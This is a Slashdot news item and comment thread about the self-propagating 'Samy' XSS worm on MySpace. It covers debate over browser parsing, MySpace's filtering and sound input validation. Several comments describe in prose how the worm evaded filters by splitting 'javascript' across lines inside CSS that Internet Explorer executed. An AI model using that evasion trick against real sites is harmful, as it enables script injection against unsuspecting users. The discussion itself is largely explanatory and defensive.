Cross-Site Scripting Worm Floods MySpace

DJ_Vegas writes "One clever MySpace user looking to expand his buddy list recently figured out how to force others to become his friend, and ended up creating the first self-propagating cross-site scripting (XSS) worm. In less than 24 hours, 'Samy' had amassed over 1 million friends on the popular online community. According to BetaNews, the worm's code utilized XMLHTTPRequest - a JavaScript object used in AJAX Web applications and was spreading at a rate of 1,000 users every few seconds before MySpace shut down its site. Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet."

XSS?

[mindstrm]

Is it really XSS if it's all happening at the same site? Just sayin.....

XMLHTTP has a same-site policy... the problem here is they let users render html & javascript in their own pages on the site. If slashdot allowed executable javascript in the comments, we'd have the same problem.

Re:XSS?

[Skye16]

No, they don't let you render JavaScript on the site. If you RTFA, he split the word "java script" into two lines, hid it in a CSS tag, and IE read it anyway. MySpace has stripped out tags for at least a year and a half.

Re:XSS?

[NicenessHimself]

The attack did include uri rewriting from profiles.myspace.com to www.myspace.com precisely to cross the sites with script. Does that count as XSS? I wonder how many /.ers are about to start seeing what kind of html they can get through the /. forum checker..

Re:XSS?

[SerpentMage]

I think the problem is that the MySpace site allows javascript to be uploaded.

http://blog.outer-court.com/archive/2005-10-13-n73 .html

From the perspective of XMLHttpRequest you cannot call a domain that is not the original HTML page. IE, Mozilla, and Safari implement same domain policy and having experimented it is not possible.

Re:XSS?

[Skye16]

Goddammit, this is what I get for not previewing.

"he split the word 'JavaScript' into two lines", and "MySpace has stripped out JavaScript and <script> tags for at least a year and a half"

Re:XSS?

[sadcox]

the problem here is they let users render html & javascript in their own pages on the site

No, the problem is that they let users render html & javascript badly in their own pages on the site

Re:XSS?

[ArsenneLupin]

If slashdot allowed executable javascript in the comments, we'd have the same problem.

Given its userbase, if Slashdot allowed this, it would have far far far worse problems. Like "if you ever read the wrong Slashdot comment with Internet Explorer, you'll leave a goatse picture on every ASP and Cold Fusion website you visit thereafter..."

Re:XSS?

And the winner for Most Confused use of Jargon goes to... you!

They don't let you "render" Javascript on the site because humans don't render anything. It's web browsers that do the rendering. There's no such thing as a CSS tag either.

Re:XSS?

wait a second... that's already happened! All the websites I visit have the goatse guy.

Re:XSS?

[ColaMan]

you'll leave a goatse picture on every ASP and Cold Fusion website you visit thereafter... ...... greatly improving their content.

Re:XSS?

[Haydn+Fenton]

No, you can't upload Javascript to MySpace. That's the whole point.
From what I gather, you can upload CSS tags and other non-harmful tags. However, 'Samy' managed to find out that instead of writing valid CSS code inside the CSS tag, you can simply write a Script tag (so long as you split it over two lines) and upload it that way.
This in itself shouldn't be a problem; since the code is inside a CSS tag it should be parsed as invalid CSS code, and so there's no reason for MySpace to have blocked it.
This is where IE comes into it, if you are using IE, IE will parse it as a valid Javascript tag anyway, and execute the code.

This isn't really a bug in MySpace (well, technically it is now), it's more like a bug in IE which can be exploited on MySpace, or any other site which allows similar tags in which code can be 'hidden'.

Re:XSS?

[arkanes]

I suspect that IEs "dynamic CSS" JavaScript exrepssions, which can contain arbitrary JavaScript, are also a XSS vulnerability just waiting to happen. The ability to do this may have something to do with why script tags are parsed in stylesheets at all.

Re:XSS?

[Markus_UW]

Haha, that's true in my opinion, Goatse is far less horrible than most ASP and Cold Fusion websites.

Re:XSS?

[Senzei]

you'll leave a goatse picture on every ASP and Cold Fusion website you visit thereafter... ...... greatly improving their content.

More like giving people a visual description of what they have stumbled upon.

Re:XSS?

[dotgain]

This isn't really a bug in MySpace (well, technically it is now), it's more like a bug in IE which can be exploited on MySpace, or any other site which allows similar tags in which code can be 'hidden'.

I wish people like you wrote/edited the article summaries around here. Cheers

Re:XSS?

[m50d]

Way to take the humour out of the joke by explaining it there dude.

AJAX vuns

[bloodredsun]

Is this the first AJAX vulnerability? Something like this would be expected in any new-ish tech that is increasing in popularity.

Re:AJAX vuns

Not first AJAX exploit. the greasemonkey one a while back is similar as is another white paper on the site listed below. this site details the anatomy of an XSS worm
http://www.securiteam.com/securityreviews/6H00D0KE AY.html

Re:AJAX vuns

[Narcissus]

This isn't an AJAX vulnerability: it's XSS that uses AJAX to do its thing. The vulnerability itself is entirely a server side issue. Well, as far as I understand it, anyway...

Re:AJAX vuns

[WhoDey]

Someone didn't quite get the point. This has nothing to do with any vulnerability in AJAX. Cross-site scripting is a result of a web app doing a poor job of redisplaying input that it was given. This was combined with a javascript object to do some malicious stuff. While that javascript object is used in AJAX applications, this is certainly not an AJAX vulnerability.

Re:AJAX vuns

[erlenic]

As others have pointed out elsewhere, it was an IE issue. MySpace apparently does filter out the word "javascript", but this guy was able to use a problem in IE to split the word across two lines, and put it inside some CSS code. For some reason, IE sees fit to execute code like that.

Re:AJAX vuns

[Limecron]

AJAX is an abstract concept that describes the use of a pair of technologies, namely JavaScript and XML. It is not a "thing" that can have a vulnerability. JavaScript and XML are ALSO not capable of having vulnerabilities either, since they're just languages. The only things that have vulnerabilites in the computer-related sense are specific pieces of software.

In this case it's a problem with IE for improperly running JavaScript where it shouldn't. Or you could argue it's MySpace's fault for not knowing that IE would run it.

Re:AJAX vuns

[Richard_at_work]

And the website blindly accepted the resultant request back with no issues. This was a website problem regardless of what happened elsewhere.

Re:AJAX vuns

[Intron]

The website got a legal form making this person the user's friend. Its not a website problem. The problem is that javascript can be injected which gets executed and does form entries without the user's knowledge. That's a browser problem.

Firefox is not necessarily immune to XSS attacks, see noscript.

Re:AJAX vuns

[dmh20002]

XmlHttpRequest breaks the ingrained UI idiom of 'nothing happens until I click something'. Ajax (specifically XmlHttpRequest) has some scary implications for phishing. From a post on JoelOnSoftware discussion list by 'JD'
For example, when someone clicks a link in an email that is out phishing for an SSN and personal info, you could be half-way through the form, and think - wait, I don't want to do this. BUT, with XmlHttpRequest, your information that you've only typed into the form has already been nabbed and sent to someone overseas - and you didn't see ANYTHING happen.

Re:AJAX vuns

[erlenic]

You do have a point there, but I wouldn't expect a website designer to have to check for invalid code, especially mid-word line breaks with code embedded in the wrong place. Was this bug in IE well documented? I've never heard of it myself. Either way, it does show just how difficult it is to fully secure a website.

Aww...

Myspace was out for a bit? Now you've REALLY given those emo kids something to cry about.

Re:Aww...

[mikael]

I bet he doesn't have over 1 million friends now.

Re:Aww...

[maxwell+demon]

Well, having over 1 million foes is also an achievement ...

Re:Aww...

[BrokenHalo]

Well, having over 1 million foes is also an achievement ...

Indeed, and well said. What would the average slashdotter do with a 10^6 friends? Buy them all christmas presents? :-P

Re:Aww...

Actually he does, until 1000000 users get around to removing "samy is my hero" from their sites. Search for the phrase in quotes in google or msn. (Msn indexes myspace quicker/better, which may or may not show how irrelevant msn search is)

Re:Aww...

What is this "friend" thing you go on about?

I find this amusing...

[Coocha]

I've got a Myspace page, because it's the most convenient way to keep in touch with some of my old classmates. I've often thought about how few practical applications these kinds of 'social networking' sites provide, aside from general time-wasting. I've also scoffed at the number of young kids who have thousands of friends, as if it's the high school popularity contest in digital form.

So this guy found a way to win the popularity contest. I scoff at him too, though at the same time I must laud him for his creativity. If other ./ers have insight as to what kind of malicious applications his XSS could be used for, I welcome the opportunity to learn. Also, what exactly IS XSS? Cross-site (to me) indicates that the script performs a function across multiple webpages... would this refer to all the peers in the Myspace cluster?

Re:I find this amusing...

[FluffyPanda]

The only XSS reference I can find is that he was able to access profiles from www.myspace.com while the user thought they were on profiles.myspace.com

Re:I find this amusing...

[lav-chan]

I've got a Myspace page, because it's the most convenient way to keep in touch with some of my old classmates. I've often thought about how few practical applications these kinds of 'social networking' sites provide, aside from general time-wasting. I've also scoffed at the number of young kids who have thousands of friends, as if it's the high school popularity contest in digital form.

Yeah, well, you're gonna expect that anywhere i guess. LiveJournal, Xanga, MySpace, BlogSpot, where-ever. I personally think MySpace does the best job of 'bringing it all together', though (blogs, message boards, friends, profiles, it's all so interconnected).

That said, MySpace is probably one of the worst-written sites of all time. Tom seems like a swell guy (i've talked to him a few times), but he and/or his team couldn't design a site if their lives depended on it. I mean that in terms of both the HTML and the 'server-side' stuff. They're constantly doing maintenance (which hardly ever seems to fix anything); they do completely random text-filtering (like you can't say '% of', the system will strip it out); the time zones are always wrong; you have to post blogs twice sometimes in order to get the auto-formatting to work; their HTML/CSS is terrible (most of their ids and classes have illegal names); the blog's design editor is retarded because the default style sheet is set to override your custom style sheet (so i'm not sure what the point is of even having the option); and so on.

Tom says he's working on a 'CSS-friendly' version of MySpace, and it seems like that's the case because suddenly there's a bunch of unused stuff if you look at the style sheet, but i have doubts that it's actually going to be much better. ... Or if it's even going to be 'CSS-friendly'.

:shrug:

Re:I find this amusing...

[giorgiofr]

I humbly suggest "Gratuito come birra e libero come formaggio" as the next release of your sig. It still makes no sense but it's funnier. :)

Re:I find this amusing...

[hazzey]

The same thing has been done with FaceBook. The only difference is that FaceBook still requires each user to actually accept the friendship. That doesn't stop people from running a script that invites everyone to be their friend.

Re:I find this amusing...

[jallen02]

Its amazing to me that the site was sold for $580 million. Obviously technical annoyances didn't stop him from making an insane amount of money off the whole deal.

Oh and % is used in LIKE queries, that may be why its filtered?

Jeremy

Re:I find this amusing...

[ryanov]

RTFA. This is the same thing MySpace did -- it generated requests from other users. He would still have to accept all of the requests, maybe with a script, but it didn't automatically make them friends.

Re:I find this amusing...

[Lehk228]

did you rtfa? the worm would cause each user viewing his page to invite him, and he had his system set up to accept all invites

Re:I find this amusing...

[MrRogers2]

According to this article, XSS is a bit of a misnomer:
The term cross site scripting is not a very accurate description of this class of vulnerability. In the words of XSS pioneer Marc Slemko:

This issue isn't just about scripting, and there isn't necessarily anything cross site about it. So why the name? It was coined earlier on when the problem was less understood, and it stuck. Believe me, we have had more important things to do than think of a better name.

Check out the full article for a good description of the types of XSS exploits.

Re:I find this amusing...

[Hosiah]

./ers

Nearly as amusing is this common typo for "/.ers". I hypothesize that Linux users are most prone, since typing "./" on the command line means "here" in the directory sense.

OT as all get out, of course.

Re:I find this amusing...

[00110011]

Why would it have to be filtered out when it could easily be escaped?

Re:I find this amusing...

[hazzey]

Sigh. Did you read my post? It is pretty clear that I knew what the differences between the two were. All I was doing was adding info to the world at large. This sort of thing seems to be a drawback to all of these "# of friends" comunities.

Re:I find this amusing...

[someonewhois]

And quotes are used in all queries, but nobody strips those. :p

Re:I find this amusing...

Yeah, well, you're gonna expect that anywhere i guess. LiveJournal, Xanga, MySpace, BlogSpot, where-ever. I personally think MySpace does the best job of 'bringing it all together', though (blogs, message boards, friends, profiles, it's all so interconnected).

Have you tried Multiply? Lots and lots of MySpace users were defecting there recently.

Re:I find this amusing...

[kurtmckee]

MySpace does the best job of 'bringing it all together', though (blogs, message boards, friends, profiles

I won't argue the kudos for bringing it all together. Nonetheless, MySpace has done a breathtakingly poor job on every individual component. Blogs are better handled at Blogger and elsewhere, photos are best shared at Flickr and elsewhere...

MySpace consolidates poorly implemented technologies into a single package, but I have little confidence that good integration is better than good implementation (of individual technologies).

Re:I find this amusing...

[Kent+Recal]

580... fuckin.. million.... ? please imagine the sound of my jaw dropping onto the table. i mean... umm... c'mon... what the hell? how long does it take to recoup that kind of money only through advertising and membership fees? i actually googled it up because i thought you had a typo... but its really over half a friggin billion us dollars. half a billion!! then i looked at the site. and was stunned even more. i mean seriously. what kind of crap is this? this looks like geocities with a bunch of (technically) seriously bad implemented gimmicks slapped on top. i can understand the community is huge and low-tech people prolly might feel less intimidated by the crappy look than by a slick design. but.... hell... half a billion??? give me a tenth of that and i build you a site better than that, in under two years!@#%

Re:I find this amusing...

[darco]

Word.

It's a travesty, that's for sure. A 1/10th of that would have funded my (now defunct) company for years. Hell, even 1/1000th of that would have quadrupled our bootstrap operating capital.

Crazy.

Re:I find this amusing...

[jallen02]

By fox none the less. And get this.. Macromedia, the company that makes ColdFusion, the programming language used to power that site only has a Market cap of something like 2.96 bn.

Heh Heh.

Go Samy!

[jeek]

Go Samy! We're rooting for you over at EFnet #olsentwins!@

Re:Go Samy!

[UnixRevolution]

Sounds like a fun channel. But Who's Olsent, and why has he won?

I just hope the channel is legal by now.

Re:Day late, dollar short.

ja slashdot is teh suck. only a place for l4m3 ch00bs to hang out. m0r0ns.

More info...

[TheSync]

Here is a recent paper on XSS viruses. Also there is an analysis of the specific MySpace worm.

Evidently LiveJournal and other sites take care to scrub out JavaScript in user-provided web pages, but the rumors are that sometimes people do figure out how to obfuscate their HTML enough to deliver the payload, despite the scrubbers.

Re:More info...

[neoform]

it's not really shocking that MySpace lets this sort of thing through, i've always been completly un-impressed with MySpace's design.. it's always been a wonder to me why people use it.. other than the obvious "everyone else is using it" syndrome..

kinda reminds me of windows..

Re:More info...

[slavemowgli]

Livejournal disallows Javascript (and even CSS) on their users' user info pages, but not in the actual journal entries.

Re:More info...

[F_Scentura]

Are you serious? "Everyone else is using it" is *the* draw for a social networking site. Its interface is decent, and it handled the Friendster migration without the same level of outages.

Re:More info...

it's not really shocking that MySpace lets this sort of thing through

Please RTFA.

Re:More info...

[nine-times]

Evidently LiveJournal and other sites take care to scrub out JavaScript in user-provided web pages, but the rumors are that sometimes people do figure out how to obfuscate their HTML enough to deliver the payload, despite the scrubbers.

MySpace also scrubs javascript. This guy put obfuscated javascript into CSS for delivery.

Re:More info...

[Jerf]

And it gets through because stupid programmers persist in making two mistakes:

1. Defining "badness" instead of "goodness"
2. Trying to "clean up" invalid code

The first one means that you try to list all of the ways that the input can be bad. The Universe is evil and it hates you. You can't list all the funky things that it can do to you. Instead, list the good things and carefully verify that the input is good.

For a simple, but very very real-world example, don't write a rule that says "If the password contains /, =, or \, reject it." Write a rule that says "Passwords may contain only letters, numbers, and underscores." In the first case, especially in the brave new world of Unicode, you'll never enumerate all the bad things that can happen.

The second mistake is that once you've decided that input is bad, do not try to clean it up. The process of cleaning it up may itself make it invalid in the case of something like HTML. Just reject it with a good error message and let the user take care of it.

If that is absolutely impossible, preferably on the lines of "you'll be fired if you don't clean it up", then at the very least, you must continue to recursively run the cleanup code until the input converges (is unchanged by the cleanup code).

It's not that it's absolutely impossible to get it right if you don't follow these rules, it's just that it's really freakin' hard. Slashdot, for instance, does seem to manage, but it took them a few iterations and ultimately, it's a low-priority site even if it does get hacked a little. Is your program that unimportant?

It's way, way easier to define legit HTML (specific tags, no attributes usually though it's easy to let a few specific ones through, even with a handful of specific values) than it is to create a function to take any arbitrary string and make "safe" HTML out of it.

Re:More info...

[shawn(at)fsu]

Wait a second, everyone is using it you say. BRB I have to go set up my profile.

Re:More info...

[amliebsch]

Defining "badness" instead of "goodness"

Is that really applicable here? We're talking about free-form content. What can you do, allow users only to use whitespace and alphanumeric characters? Completely disable using angle brackets? The "badness" you are trying to prevent is distinguishable from the "goodness" only by the patterns that it occurs in. So you say, don't clean it? The real problem here is even identifying that it needs to be cleaned at all. You can't even reject bad input outright if you can't identify that it has a problem.

Re:More info...

[ffrinch]

That's not true. You can add JavaScript to entries, but it will never be displayed on the page. The HTML cleaner strips it out.

Occasionally someone finds a new security hole, but they're patched pretty quickly.

Re:More info...

[Jerf]

We're talking about free-form content.

No, we're not. We're talking about HTML, or things that end up as HTML. (For instance, Wiki formatting, UBB formatting, etc.) It's not English text that spread like a virus, it's code.

If you can't figure out how to write something that identifies good HTML, then you absolutely, positively should not be writing code for the web. If you think HTML is "free-form content", you're part of the problem.

The "badness" you are trying to prevent is distinguishable from the "goodness" only by the patterns that it occurs in.

No shit. You are aware that there are decades of work in computer science on the topic? And that the relevant work is all nicely packaged up as libraries that don't even require to really understand said decades of work?

All you have to do is hook up an HTML parser, and reject the content the instant you see anything bad; tags not in the approved list, attributes not in the approved list, etc. For extra bonus points to defend against a bad parser you might consider re-outputting the HTML from the parse tree via your own code that can be guaranteed to only produce safe, code-free HTML by construction, but that's generally unnecessary because for someone who actually knows what they're doing an HTML parser is not that hard, and the crappy/buggy ones generally stay very safely un-famous. (An HTML parser that gracefully handles the shitty HTML on the web today is quite a different story, but that doesn't apply here; you shouldn't be using such a thing for verification.)

If you truly find this hard, you need to either grow your skills until it isn't, stop programming for the web, or batten down the hatches and prepare for the day when something crappy like this happens to your site. The same extends to anytime user input may be interpreted as code that affects anyone else, too. I'm not the one presenting you with these choices; I'm just explaining the situation. It's just that this is how it works, in the real world. "But it's hard!" doesn't change anything.

Re:More info...

[MobyDisk]

Your concepts are right, but I see two flaws in your execution:

1) Write a rule that says "Passwords may contain only letters, numbers, and underscores."

Rules like this are arbitrary and cause other problems. My passwords use more than just letters, numbers, and underscores. There are lots of other characters that are perfectly valid. If you are going to define what is good, define it universally, not arbitrarily. How about all non-control ASCII characters: 32-126? It is safe but also non-restrictive.

2)For a simple, but very very real-world example, don't write a rule that says "If the password contains /, =, or \, reject it."

There is nothing wrong with / = and \. If your code somewhere on the back-end treats those as escape characters then you have a security bug that needs to be fixed at that level. Limiting the user is not the solution because what if those characters make it in to your library through some other route?

If you are referring to the Unicode escape strings like \u000A then you are not following another rule, which I'll add to your list as rule #3:

1. Defining "badness" instead of "goodness"
2. Trying to "clean up" invalid code
3. Not using the appropriate parser

If someone enters in \u000A and then your code should either treat that as the 6 character sequence that it is, at which point there is no problem; or it should treat it as a newline character which will be rejected. Either way you are fine. It is only a problem if you treat it one way in one part of the code, and another way in another part of the code. That's why you use the proper parser. If the user entered ASCII and you wanted UNICODE then the UNICODE parser will see that as a newline and you will reject it. If they entered ASCII and you wanted ASCII then that sequence does nothing and you are fine. If your filtering routine treats it as ASCII then you later make it UNICODE and pass it to a SQL server then the user may have snuck something in. Really, if you use the appropriate parser than characters never need to be filtered. Suppose a malicious tries a SQL injection by entering in a \ or an unmatched quote or a newline character, then I don't need to be afraid so long as I used the SQL engine's prepare() command to parse the string. It knows how to escape the strings properly. So there is no need to filter anything.

Re:More info...

[NMerriam]

It's not English text that spread like a virus, it's code.

But isn't the very exploit we're discussing a case of plain english text being interpreted by some browsers as HTML markup?

Re:More info...

[MichaelSmith]

The bug tracking system in used by my employers IS department sends html encoded emails with text/plain mime headers. Presumably OE users see formatted html because the text starts with an html tag but sylpheed faithfully displays the source code.

I raised a bug for this and of course got a whole lot of html code sent back at me saying that thy would get right on it. Just like six months ago.

Re:More info...

[Kent+Recal]

But isn't the very exploit we're discussing a case of plain english text being interpreted by some browsers as HTML markup?

Anyone dealing with HTML knows that browsers tend to deal "gracefully" with malformed code.

Therefor, unless this is your first year of "real world programming", you have probably learned that *all* user input that is supposed to be fed back to other clients as HTML must either have all angle brackets replaced by &lt; and &gt; *or* the stuff must be piped through a (really, really simple) HTML parser.

This little newline stunt is a no-brainer: neither <java script> nor <java\nscript> is an allowed tag - so drop it.

I find it rather amusing that a website that claims to be worth $580 million fails over such a basic (fundamental, elementary, ridiculously obvious) concept...

Re:More info...

[NMerriam]

Thanks for the clarification!

Back in my day

[Dachannien]

And to think that, back in the day, people made friends by actually talking to other people.

Re:Back in my day

[n7022c]

That os SOOO low-tech, dude.

Re:Back in my day

[FlopEJoe]

Almost sad... hacking for online "friends." Like how my mother had to tie some liver to my collar to get the family dog to play with me :(

Re:Back in my day

That's the same argument people used to make against email and IM.

Re:Back in my day

At least with e-mail and IM, you're actually communicating with someone.

Re:Back in my day

Are you sure that was your mother? It sounds like she wanted the dog to rip out your throat.

Re:Back in my day

[Captain+DaFt]

How'd that work out for you?
When My mom tried it with me, the dog turned vegan. }:P

Re:Back in my day

[berbo]

You had words? Luxury! Back in my day, all we had were grunts - and we liked it!

Well, people have been saying it's a security risk

[g_dunn]

And people still leave it enabled in absurd situations like this. Hopefully MySpace and the other journal-esque sites who still have javascript enabled get a clue. While their poor security only affected themselves this time, someone with more malicious intent could easily take advantage of this for alot more destructive actions than merely viral friendmaking.

Awsome

[AForwardMotion]

He'll probably get a lot of job offers from this.

Re:Awsome

[bornbitter]

yeah, like stamping license plates... if he further 'improves' his resume. Then his 'friends' will show up in a nice shiny black saburban and show him how real 'friendship bracelets' won't come off without the 'friend's' key. He might even get a new room-mate!

Re:Awsome

[PickyH3D]

You think he can handle life outside his parent's basement?

Terrorism!

Subverting MySpace to create 1,000 friends per second? Obviously a terrorist. Send him to Gitmo!

Re:Day late, dollar short.

[Iriel]

These '/. is slow and stupid' kind of posts just need to stop. But I listen to 4 different tech podcasts and hadn't heard about this yet. Think about the people who check /. for news while they're at work and most likely away from iTunes and their bookmarks, and (god-forbid) without a readily accessible aggregator. Realize this site for what it is: for the majority of it, other techies posting news they've heard about to a community they might think will care to hear it. This isn't "news as it happens updated every second" so stop treating it like it is.

The Microsoft curse?

[alucinor]

So ... MS invents XMLHttpRequest ... what's logically to follow with *any* new technology MS invents? Here's for hoping that their "magic touch" will end here.

IE is too forgiving

[benhocking]

In the past, I've been of mixed feelings with IE correctly rendering the "intent" of a web-designer when the web-designer has created buggy HTML - this includes such things as omitting terminating tags (e.g., &ltl\li>) as well as a few other things. The result of IE doing this was that some web pages look good in IE that didn't look good in other browsers - thus encouraging more people to use IE. As HTML was being used more and more by the masses, there seemed some logic to this. Of course, one of the problems with this idea is that the designers were looking at their web-pages in IE to see if their code was written correctly.

This story just goes to emphasize the importance of calling buggy HTML code what it is, and not trying to infer the intent of the HTML coder. Samy cleverly found a way to make "buggy code" that would get past MySpace's filter, but that would be rendered the way he intended by the browser with the majority market share.

Re:IE is too forgiving

[saforrest]

omitting terminating tags (e.g., &ltl\li>)

You seem to have been meaning to write '': just out of curiosity, did you deliberately omit the semicolon in the HTML entity for 'less than'? I ask because that (omitting the ;) is another example of what you're complaining about. :)

Re:IE is too forgiving

[Kawahee]

This exploit isn't limited to IE, Safari also has this problem. And I'd probably attribute it to 'logical' coding
pseudo-c code:

if (tagname == "style" && tagtype == "text/css") {

process_stylesheet (taginfo);

} else if (tagname == "style") {

switch (tagtype) {

case "text/javascript":

process_js (taginfo);
break;

}

}


But hopefully something less obvious that doesn't scream security flaw.

Re:IE is too forgiving

[smooth+wombat]

In the past, I've been of mixed feelings with IE correctly rendering the "intent" of a web-designer when the web-designer has created buggy HTML - this includes such things as omitting terminating tags (e.g., &ltl\li>) as well as a few other things

I once made a comment in the Firefox forums about the difference between the way IE and Firefox interpret web pages. IE believes that everyone is an idiot and will pat the designer on the head and fix the errors without telling you what you did wrong. Firefox on the other hand presumes you are reasonably competent at what you are doing and will let you know when you screw up.

Re:IE is too forgiving

I realy dont think your examples are the best. Its fully legal in html to not close

Re:IE is too forgiving

[jferris]

Not to go off on a little bit of a tangent, but you really hit upon something that is very irksome to me. Has anyone besides me stopped to wonder if the fact that there are a large number of largely ignorant HTML jockeys out there is because of the fact that IE continually "interprets" their best intentions? You have to stop and wonder if IE actually become more stict in parsing and rendering, if a fair number of people would find themselves out of work... This is intended as a knock against web developers, either. I do my fair share of web development work, as well.

Re:IE is too forgiving

LI does not require a closing tag. Take a look at the spec:
http://www.w3.org/TR/REC-html40/struct/lists.html

Re:IE is too forgiving

HTML 4.01, a standard that web browsers should support, allows this.

http://www.w3.org/TR/html4/struct/lists.html

Re:IE is too forgiving

[StillNeedMoreCoffee]

I have a 3d party site that brands its content for us but does it using and tags. The tag is forbidden by the W3C standard

http://www.w3.org/TR/REC-html40/struct/objects.htm l#h-13.2

Notice "Start tag: required, End tag: forbidden"

Which is pretty unambiguous.

That sites response to letting them know that they were putting out "Forbidden" tags was to come up with a "Compatiability Matrix" for which browsers and vesions of browsers would work with there site.

This is unfortunately the attitude of many sites and site designers. If it works for I.E. then we are done. We just docuement the bug with a compatibility matrix and we are golden. The problem here is in the branding, if you have Netscape and some versions of Firefox and a few others, our company logo will not show.

My contention is if you have a product that only works for one browser you have a client server application not a web application.

Re:IE is too forgiving

[idokus]

from the w3.org :
html 3.2 standard: http://www.w3.org/TR/REC-html32#dtd
html 4.0 standard: http://www.w3.org/TR/1998/REC-html40-19980424/stru ct/lists.html

both state (though in example): that LI elements do not need to be terminated.

So it is not the wrong rendering, it valid HTML.

I don't know about XHTML (couldn't look it up so quickly) but going on the basics, it looks as though it is not necessary there either, since the only elements a UL or OL can have are LI elements. Therefor, if another LI at the same level start it is unambigiously that it is also the end of the privious one.

But if you go by the definition of XML then yes, it should not be omitted, but HTML is not XML.

But don't blame a browser for a buggy definition. You can Blame IE for having nonstandard tags, and allowing for example <b>some text<i>some more text</b>and then something else</i>

Re:IE is too forgiving

[HTH+NE1]

So IE implements HTML for DWIMmies?

Re:IE is too forgiving

[MCraigW]

But XHTML does require closing tags on all non-empty elements. See http://www.w3.org/TR/2002/REC-xhtml1-20020801/#h-4 .3

Re:IE is too forgiving

[MCraigW]

XHTML requires closing tags on all non-empty elements. See http://www.w3.org/TR/2002/REC-xhtml1-20020801/#h-4 .3

Re:IE is too forgiving

[MCraigW]

Very few web-sites, including this one, use valid HTML. Pick a web site and then check it out on the W3C Validator: http://validator.w3.org/detailed.html

Slashdot now blocks you from checking it's site using the validator.... Not long ago though, (when it switched to HTML 4.01) it did allow it, and none of the Slashdot pages I checked passed validation.

Oh... and this invalid HTML renders just fine in FireFox, as well as pretty much any other browser.

Re:IE is too forgiving

[smooth+wombat]

Absolutely. I didn't mean that a site had to be coded perfectly. Just that it had to be somewhat close. Even FF will forgive some errors.

However, leaving out an opening or closing <HTML> tag will cause FF to display text rather than the page whereas IE will continue to render the page because it will put in the missing tag.

Re:IE is too forgiving

[idokus]

Tnx, I did look for it, just couldn't find it.
I also thought it was necessary for XHTML, but I do think it is a bit redundant, due to the fact that by the definition a LI element needs to be enclosed by or its parent's (UL or OL) or a next element.

for example:
UL
  LI other xhtml /LI
  some other tag /some other tag
  LI other xhtml /LI
/UL

is infact an illegal XHTML statement, thus every LI-element is followed by either LI-element or (/UL | /OL)

ok XHTML isn't completely XML compliant if you define it that way. But that's just a small price to pay.

And therefor it is, I think just unnecessary code, just as easily parsable, unless of course you can redefine a list in XHTML, but I don't think that's allowed.
it's just more to write if you write it by hand. For generated files it probably will be just as easy.

Re:IE is too forgiving

Or you could write pseudo-c that doesn't suck:

if (tagname == "style") {
    switch (tagtype) {
        case "text/css":
            process_stylesheet (taginfo);
            break;
 
        case "text/javascript":
            process_js (taginfo);
            break;
        }
}

Re:IE is too forgiving

Thanks asshole, now you are in my friends list.

Re:IE is too forgiving

[Bert64]

IE will also render html if it's mime type is TEXT/PLAIN, you might assume that you could return any data in a text/plain page and the browser wouldn't try to interpret it, so you're safe from cross site scripting.. But your not, not if your users run IE.

Re:IE is too forgiving

[Bert64]

The result of IE rendering bad html coupled with it's popularity has been very bad for the web... If none of the most popular browsers rendered broken html, then web designers would have no choice but to put out working html..
The MySpace example is a good one.. If html all follows standards, then it's relatively easy to filter out anything malicious, but when your filter has to cater for every non standard behaviour it becomes very difficult.. Not to mention the fact that most of these behaviours are not documented..
What it boils down to, is microsoft intentionally rendering poor html, and also putting out tools to create bad html (frontpage) with the intent of making sites that didn't render in netscape.. Then they could point and say "look how crap those sites look in netscape, they render fine in ie" and 99% of people wouldn`t realise what was truly happening.

Re:IE is too forgiving

[Kawahee]

Amazing. You managed to apply my logical coding argument to my code to make it even worse. If you read my comment, you'll see that was what I was getting at. You could make it even better by having a linked list of tags and their process_* functions, and a linked list of types and their process_* functions, and have type prioritise over tag, and end up with IE and Safari and my original argument sort of thing.

Here's the Guys Explanation of his code

[putko]

Here is his explanation -- it goes over the transformations he had to make to the program to smuggle it past Myspace's filters.

And here is his version of the story.

He comes off as a sweet practical joker. But maybe that's just b.s. that he cooked up after he realized he might have some 'splainin' to do.

Also, his site really is "namb.la" -- he's making some sort of joke at NAMBDLA's expense, which is pretty suspect, I think.

Re:Here's the Guys Explanation of his code

[Kristoffer+Lunden]

What's so wrong with joking with the North American Marlon Brando Look Alikes? I think they can take it. =)

Re:Here's the Guys Explanation of his code

You're kidding right? I thought NAMBLA's mission statement was to be the butt of jokes.

Re:Here's the Guys Explanation of his code

[fmwap]

Wow, this guy is so fucked...

Not only releasing a self propagating worm, but openly confessing to copyright infringement in his explanation.

If I were Samy, I'd be on the first flight out of the country.

Re:Here's the Guys Explanation of his code

Here is his explanation

Yeah, right. There's no way you're tricking me into going to some page with a suspicious URL like that!

Re:Here's the Guys Explanation of his code

Making a joke at NAMBDLA's expense? I don't know who this NAMBDLA group is, but it seems more likely he's making a reference to the North American Man-Boy Love Association (NAMBLA). Personally I think it's just fine to make jokes at their expense.

Re:Here's the Guys Explanation of his code

[Hosiah]

Yeah, right.

LOL No kidding! "Here's the home page of the guy famous for writing viral web code that infects your browswer, wanna go see it?" Golly, sounds like a swell idea, what's the worst that could happen?

Re:Here's the Guys Explanation of his code

[HexRei]

ya, anyone who would make a joke at the expense of those wonderful nambla fellows must be a dirty rotten scoundrel.

With a name like MySpace...

[Eric+Giguere]

... it shouldn't be surprising that someone took it literally and tried to claim it all for himself.

Eric
William Shatner boldly goes like no man has before

samy is my hero

[gr8n10zt]

The scoop from himself: http://fast.info/myspace/

In the beginning

[Dogsbody_D]

This was bound to happen sooner or later, as MySpace repeats the history of the internet. Just look at the huge number of practically unreadable webpages with different size fonts and different colours, terribly innappropriate background images. Oh, and a load of commercial interests trying to stuff things down our throats. Loads of chicks though... ;)

Re:In the beginning

[White+Shade]

there ARE lots of chicks, yes, but they're all 15 years old! (claiming to be 99, and that they're "bi", and "married" to their favourite female friend from middle school, haha)

myspace is certainly addictive though ;)

Interview with "Samy"

[Bananatree3]

There is some guy's blog that has a personal interview with Samy, the writer of this "my hero" worm here ):

Re:Interview with "Samy"

[GeoSanDiego]

Slashdot coulda had the scoop. I know Samy and I submitted this to them 3 days ago: http://fast.info/samy

Re:Day late, dollar short.

So true. Don't go away mad kids, just go away

samy is my hero

[zippity8]

Turns out that he just used the fact that (not trying to start a flame war here) IE and some versions of Safari allow javascript tags within CSS.

Samy's info on the topic (coral)
His explanation of how it works

And the phrase for self-replicating viruses was...

[benhocking]

And the phrase for self-replicating viruses was "gossip". Unfortunately, the viruses would occasionally replicate with mutations, but this only made them stronger.

